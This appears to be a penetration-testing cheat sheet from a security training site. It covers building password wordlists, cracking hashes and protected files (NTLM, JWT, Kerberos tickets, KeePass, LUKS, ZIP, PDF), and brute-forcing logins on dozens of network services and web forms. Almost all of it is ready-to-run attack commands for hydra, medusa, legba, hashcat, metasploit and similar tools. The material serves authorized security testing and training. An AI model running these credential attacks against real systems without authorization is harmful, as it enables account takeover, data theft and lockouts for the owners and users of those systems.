Brute Force - Services, web, local, tools & wordlists
A comprehensive brute force guide covering web logins, APIs, and local services like IMAP, MySQL, and LDAP using tools like Hydra, Medusa, Legba, and more.
Become VeryLazyTech member! ๐
Follow us on:
โ Twitter @VeryLazyTech.
๐พ Github @VeryLazyTech.
๐ Medium @VeryLazyTech.
๐บ YouTube @VeryLazyTech.
๐ฉ Telegram @VeryLazyTech.
๐ต๏ธโโ๏ธ My Site @VeryLazyTech.
Visit our shop for e-books and courses. ๐
Default Credentials
Search in google for default credentials of the technology that is being used, or try these links:
One of the easiest and most overlooked attack vectors is the use of default usernames and passwords. Many systems, especially routers, cameras, IoT devices, web panels, and enterprise software, ship with default login credentials. These are often never changed โ making them low-hanging fruit for attackers and red teamers alike.
Before launching a brute-force attack, always check whether the system uses default creds. You can often find these in documentation, online forums, or public lists.
๐ Top Resources for Default Credentials:
Create Your Own Dictionaries
While default credential lists are a great starting point, custom wordlists tailored to your target dramatically increase the success rate of brute-force and dictionary attacks. By gathering intel about the target, you can generate personalized passwords that are far more likely to work.
Here are some effective methods and tools for building your own dictionaries:
Crunch โ Custom Pattern Generator
crunch allows you to generate wordlists with fine control over length, character sets, and patterns.
# Length 4 to 6, using numbers and uppercase hex
crunch 4 6 0123456789ABCDEF -o crunch1.txt
# Length 4 only, using predefined charset
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
# Pattern-based example
crunch 6 8 -t ,@@^^%%
@ = lowercase | , = uppercase | % = numbers | ^ = special charactersWebsite-Based Wordlists
Leverage content from target websites to generate relevant wordlists:
# Use CeWL to scrape words from a target site
cewl https://example.com -m 5 -w words.txt
# Tok grabs words from a list of URLs
cat urls.txt | tok
# Extract words from JS files (via getjswords)
cat js-urls.txt | python3 getjswords.pyCUPP (Common User Passwords Profiler)
Generate passwords based on personal info like name, birthdate, pets, etc.
python3 cupp.py -hWister โ Wordlist Mutator
Create highly customized lists by combining keywords and patterns.
python3 wister.py -w john james 1025 summer london 1999 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____|__ __| ____| __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __| | _ /
\ /\ / _| |_ ____) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 54672 lines.
Finished in 0.670s.Pydictor โ Advanced Dictionary Generator
Powerful Python-based wordlist generator with smart rulesets. GitHub: bluetiger9/pydictor
๐ Popular Wordlists & Repositories:
Tools
Hash examples: https://openwall.info/wiki/john/sample-hashes
hash-identifier
> <HASH>Hashcat
Hashcat attacks
Wordlist attack (
-a 0) with rules
Hashcat already comes with a folder containing rules but you can find other interesting rules here.
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.ruleWordlist combinator attack
It's possible to combine 2 wordlists into 1 with hashcat.
If list 1 contained the word "hello" and the second contained 2 lines with the words "world" and "earth". The words helloworld and helloearth will be generated.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!Mask attack (
-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmaskWordlist + Mask (
-a 6) / Mask + Wordlist (-a 7) attack
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txtHashcat modes
hashcat --example-hashes | grep -B1 -A2 "NTLM"Cracking Linux Hashes - /etc/shadow file
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-SystemsCracking Windows Hashes
3000 | LM | Operating-Systems
1000 | NTLM | Operating-SystemsCracking Common Application Hashes
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw HashCommon Services
Once you've got a solid wordlist, it's time to test it against live services. Below are examples for brute-forcing commonly exposed protocols using Hydra, Nmap, Metasploit, Legba, and more.
nmap -p 548 --script afp-brute <IP>Using Metasploit:
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_TO_PASSWORDS>
msf> set USER_FILE <PATH_TO_USERS>
msf> runnmap --script ajp-brute -p 8009 <IP>AMQP (ActiveMQ, RabbitMQ, Qpid, etc.)
legba amqp --target localhost:5672 --username admin --password data/passwords.txt
# Add --amql-ssl if needed for SSL connectionsCassandra / ScyllaDB
nmap --script cassandra-brute -p 9160 <IP>
# Using Legba
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042Cisco
CouchDB
Metasploit:
msf> use auxiliary/scanner/couchdb/couchdb_loginOr using Hydra:
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /hydra -L /usr/share/brutex/wordlists/simple-users.txt \
-P /usr/share/brutex/wordlists/password.lst \
10.10.10.10 -s 5000 https-get /v2/Elasticsearch
hydra -L /usr/share/brutex/wordlists/simple-users.txt \
-P /usr/share/brutex/wordlists/password.lst \
localhost -s 9200 http-get /Hydra Example:
hydra -l root -P passwords.txt <IP> ftpNcrack Example:
ncrack -p 21 --user root -P passwords.txt <IP>Medusa Example:
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftpLegba Example:
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21HTTP Burte Force
Login Form bruteforce
POST, Single list, filter string (hide)
wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
#Here we have filtered by linePOST, 2 lists, filter code (show)
wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
#Here we have filtered by codeGET, 2 lists, filter string (show), proxy, cookies
wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"Bruteforce Directory/RESTful bruteforce
Arjun parameters wordlist
wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZPath Parameters BF
wfuzz -c -w ~/git/Arjun/db/params.txt --hw 11 'http://example.com/path%3BFUZZ=FUZZ'Header Authentication
Basic, 2 lists, filter string (show), proxy
wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --basic FUZZ:FUZ2Z "http://example.com/index.php"NTLM, 2 lists, filter string (show), proxy
wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php"Cookie/Header bruteforce (vhost brute)
Cookie, filter code (show), proxy
wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ" "http://example.com/index.php"User-Agent, filter code (hide), proxy
wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ" "http://example.com/index.php"Host
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-
top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u
http://example.com -t 100HTTP Verbs (methods) bruteforce
Using file
wfuzz -c -w methods.txt -p 127.0.0.1:8080:HTTP --sc 200 -X FUZZ "http://example.com/index.php"Using inline list
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://testphp.vulnweb.com/Directory & Files Bruteforce
#Filter by whitelisting codes
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,202,204,301,302,307,403 http://example.com/uploads/FUZZHTTP Basic Auth
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/HTTP - NTLM
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for httpsFor https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTPhydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John# Hashcat
hashcat -m 16500 -a 0 jwt.txt wordlists/rockyou.txt
# CrackJWT
python crackjwt.py <JWT> /usr/share/wordlists/rockyou.txt
# John the Ripper
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
# JWT Tool
python3 jwt_tool.py -d wordlists.txt <JWT>
# C-JWT-Cracker
./jwtcrack <JWT> 1234567890 8
# JWT-Pwn
python3 jwt-cracker.py -jwt <JWT> -w wordlist.txt
# JWT-Cracker (Node.js)
jwt-cracker "<JWT>" "abcdefghijklmnopqrstuwxyz" 6Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbiKeepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hashnmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-matchLucks image
https://github.com/glv2/bruteforce-luks
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mntcryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mntAnother Luks BF tutorial: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1
ncrack mqtt://127.0.0.1 --user test โP /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txtnmap -sV --script mongodb-brute -n -p 27017 <IP>
# Metasploit
msf> use auxiliary/scanner/mongodb/mongodb_login
# Legba
legba mongodb --target localhost:27017 --username root --password data/passwords.txt# MSSQLPwner - Bruteforce using tickets, hashes, and/or passwords
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
# Legba
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433# Hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# Metasploit
msf> use auxiliary/scanner/mysql/mysql_login
msf> set VERBOSE false
# Medusa
medusa -h <IP/Host> -u <username> -P <password_list> -f -t <threads> -M mysql
# Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9dNTLM cracking
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.potOpen Office Pwd Protected Column
If you have an xlsx file with a column protected by a password you can unprotect it:
Upload it to google drive and the password will be automatically removed
To remove it manually:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txtIn order to use oracle_login with patator you need to install:
pip3 install cx_Oracle --upgradeOffline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30PDF
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdfPDF Owner Password
To crack a PDF Owner password check this: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/
PGP/GPG Private key
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hashhydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
# Insecure
legba pop3 --username [email protected] --password wordlists/passwords.txt --target localhost:110
# SSL
legba pop3 --username [email protected] --password wordlists/passwords.txt --target localhost:995 --pop3-sslPostgreSQL
hydra -L /root/Desktop/user.txt โP /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> โU /root/Desktop/user.txt โP /root/Desktop/pass.txt โM postgres
ncrack โv โU /root/Desktop/user.txt โP /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432PFX Certificates
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfxYou can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter โu <Username> <IP>RDP
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]Redis
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra โP /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -Vhydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -Vhydra -L <Username_list> rsh://<Victim_IP> -v -Vnmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>hydra -l root -P passwords.txt <IP> rtspSFTP
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmpnmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username [email protected] --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080SQL Server
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt โP /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> โU /root/Desktop/user.txt โP /root/Desktop/pass.txt โM mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENThydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22Weak SSH keys / Debian predictable PRNG
Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as snowdroppe/ssh-keybrute. Pre-generated sets of weak keys are also available such as g0tmi1k/debian-ssh.
STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ)
The STOMP text protocol is a widely used messaging protocol that allows seamless communication and interaction with popular message queueing services such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations.
legba stomp --target localhost:61613 --username admin --password data/passwords.txthydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any pluginVNC
hydra -L /root/Desktop/user.txt โP /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> โu root -P /root/Desktop/pass.txt โM vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt โt 1 โx retry:fgep!='Authentication failure' --max-retries 0 โx quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lstWinrm
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txtZIP
#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zipzip2john file.zip > zip.john
john zip.john#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attackKnown plaintext zip attack
You need to know the plaintext (or part of the plaintext) of a file contained inside the encrypted zip. You can check filenames and size of files contained inside an encrypted zip running: 7z l encrypted.zip
Download bkcrack from the releases page.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.johnOnline cracking databases
https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value)
https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
https://crackstation.net/ (Hashes)
https://md5decrypt.net/ (MD5)
https://gpuhash.me/ (Hashes and file hashes)
https://hashes.org/search.php (Hashes)
https://www.cmd5.org/ (Hashes)
https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
Check this out before trying to brute force a Hash.
Learn & practice For the Bug Bounty
Last updated
Was this helpful?